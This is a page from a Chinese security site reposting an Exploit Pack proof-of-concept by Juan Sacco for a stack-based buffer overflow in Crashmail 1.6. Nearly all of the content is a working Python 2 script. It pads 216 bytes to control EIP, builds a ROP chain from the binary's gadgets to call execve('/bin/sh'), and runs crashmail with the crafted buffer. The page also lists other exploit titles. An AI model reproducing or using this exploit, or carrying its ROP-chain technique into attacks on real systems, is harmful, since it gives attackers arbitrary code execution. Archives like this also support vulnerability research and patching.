首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Crashmail 1.6 - Stack-Based Buffer Overflow ( ROP execve ) 来源：http://exploitpack.com 作者：Sacco 发布时间：2018-03-26   # Exploit author: Juan Sacco <jsacco@exploitpack.com> # Website: http://exploitpack.com # # Description: Crashmail is prone to a stack-based buffer overflow because the application fails to perform adequate boundary checks on user supplied input. # Impact: An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition. # Vendor homepage: http://ftnapps.sourceforge.net/crashmail.html # Affected version: 1.6 ( Latest )   import os, subprocess from struct import pack   p = lambda x : pack('I', x) IMAGE_BASE_0 = 0x08048000 # ./crashmail rebase_0 = lambda x : p(x + IMAGE_BASE_0)   # Control of EIP at 216 # ROP chain: execve ( binsh ) # Static-linked junk = 'A'*216 # Fill ropchain = rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret; ropchain += '//bi' ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret; ropchain += rebase_0(0x000e9060) ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret; ropchain += rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret; ropchain += 'n/sh' ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret; ropchain += rebase_0(0x000e9064) ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret; ropchain += rebase_0(0x000391a0) # 0x080811a0: xor eax, eax; ret; ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret; ropchain += rebase_0(0x000e9068) ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret; ropchain += rebase_0(0x000001f9) # 0x080481f9: pop ebx; ret; ropchain += rebase_0(0x000e9060) ropchain += rebase_0(0x000e0e80) # 0x08128e80: pop ecx; push cs; adc al, 0x41; ret; ropchain += rebase_0(0x000e9068) ropchain += rebase_0(0x000705aa) # 0x080b85aaop edx; ret; ropchain += rebase_0(0x000e9068) ropchain += rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret; ropchain += p(0xfffffff5) ropchain += rebase_0(0x00051dc7) # 0x08099dc7: neg eax; ret; ropchain += rebase_0(0x00070e80) # 0x080b8e80: int 0x80; ret; evil_buffer = junk + ropchain   print "[*] Exploit Pack http://exploitpack.com - Author: jsacco@exploitpack.com" print "[*] Crashmail 1.6 - BoF ( ROP execve)" print "[?] Payload can be read trough a file or STDIN"   try:     subprocess.call(["./crashmail","SETTINGS", evil_buffer]) except OSError as e:     if e.errno == os.errno.ENOENT:         print "[!] Crashmail not found"     else:         print "[*] Error executing exploit"     raise   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Allok Quicktime to AVI MPEG DV ·Dell EMC NetWorker - Denial of ·Hikvision IP Camera versions 5 ·WM Recorder 16.8.1 - Denial of ·Android Bluetooth - BNEP BNEP_ ·TL-WR720N 150Mbps Wireless N R ·Android Bluetooth - BNEP bnep_ ·XenForo 2 - CSS Loader Denial ·ModSecurity For Nginx Use-Afte ·Easy CD DVD Copy 1.3.24 - Loca ·Kaseya Virtual System Administ ·Easy Avi Divx Xvid to DVD Burn   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved